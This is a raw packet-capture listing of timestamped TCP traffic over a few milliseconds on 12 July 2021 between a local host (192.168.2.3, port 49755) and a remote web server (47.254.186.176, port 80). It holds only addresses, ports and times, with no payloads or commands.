Jul 12, 2021 10:29:51.679984093 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.679996967 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680021048 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.680028915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680052042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680071115 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.680082083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680104017 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680125952 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680149078 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680165052 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.680182934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680207968 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680229902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680239916 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.680263042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680283070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680301905 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.680314064 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680335045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680360079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680366039 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.680387974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680413008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680418968 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.680442095 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.680453062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680474043 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680496931 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680517912 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.680531025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680557966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680563927 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.680587053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680610895 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.680619955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680644989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680666924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680687904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680696964 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.680718899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680727959 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.680749893 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.680761099 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.680943012 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681013107 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.681036949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681061983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681086063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681108952 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681119919 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.681150913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681158066 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.681179047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681201935 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681226015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681235075 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.681257010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681277990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681288004 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.681312084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681337118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681344032 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.681365013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681389093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681396008 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.681416035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681441069 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681447029 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.681468010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681482077 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.681498051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681549072 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.681724072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681746960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681768894 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681787968 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.681804895 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681827068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681844950 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.681862116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681886911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681910038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681931019 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.681941986 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681957960 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.681973934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.681993961 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682015896 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682029963 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.682046890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682071924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682077885 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.682097912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682106972 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.682127953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682185888 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.682282925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682383060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682405949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682429075 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682468891 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.682504892 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.682552099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682810068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682832956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682853937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682878017 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682902098 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.682909966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682934046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682955980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.682980061 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.683027983 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.683331966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683355093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683381081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683408976 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683415890 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.683439016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683458090 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.683469057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683490038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683511972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683533907 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.683541059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683568954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683574915 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.683597088 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683605909 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.683626890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683650970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683669090 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.683686972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683708906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683731079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683752060 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.683759928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683782101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683800936 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.683815002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683841944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.683849096 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.683896065 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.684001923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684039116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684062004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684083939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684111118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684117079 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.684143066 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684159994 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.684176922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684189081 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.684211016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684231997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684256077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684277058 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.684290886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684303045 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.684324980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684346914 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684367895 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684377909 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.684401989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684412956 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.684432983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684454918 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684478998 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684487104 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.684509993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684520006 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.684544086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684582949 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.684900999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684923887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684946060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684982061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.684992075 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.685017109 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685039997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685060978 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.685071945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685098886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685106039 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.685136080 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.685544014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685565948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685590029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685638905 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.685652018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685674906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685695887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685719013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685744047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685754061 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.685779095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685789108 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.685810089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685832977 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685843945 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.685864925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685885906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685904026 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.685915947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685937881 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685959101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.685980082 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.685997963 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.686014891 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.686028004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.686050892 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.686072111 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.686094999 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.686135054 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.686779976 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.686803102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.686825037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.686846018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.686856985 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.686878920 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.686902046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.686918974 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.686933041 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.686954021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.686963081 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.686986923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.686997890 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.687022924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687046051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687068939 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.687078953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687102079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687127113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.687145948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687166929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687191010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687207937 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.687225103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687252998 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687259912 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.687282085 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687293053 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.687315941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687364101 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.687397957 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687419891 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687443018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687470913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687477112 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.687500954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687515020 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.687536001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687575102 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.687612057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687635899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687660933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687683105 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687705994 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687731028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687736988 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.687741041 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.687763929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687769890 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.687793970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687815905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687838078 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687846899 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.687870979 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687894106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687903881 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.687927008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687942982 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.687958956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.687979937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688002110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688026905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688033104 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.688055038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688065052 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.688085079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688093901 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.688114882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688138008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688159943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688194036 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.688220024 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.688312054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688493013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688510895 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688527107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688543081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688551903 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.688570976 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688591957 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688597918 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.688616991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688621998 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.688638926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688654900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688663006 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.688704967 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.688750029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688774109 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688793898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688811064 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.688827991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688851118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688863993 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.688883066 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688899994 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688915014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688925982 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.688944101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.688961983 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.688968897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.689013004 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.689497948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.689529896 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.689563036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.689589977 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.689610004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.689642906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.689671993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.689694881 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.689723969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.689743996 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.689775944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.693371058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.693402052 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.693418026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.693434954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.693451881 CEST	80	49755	47.254.186.176	192.168.2.3
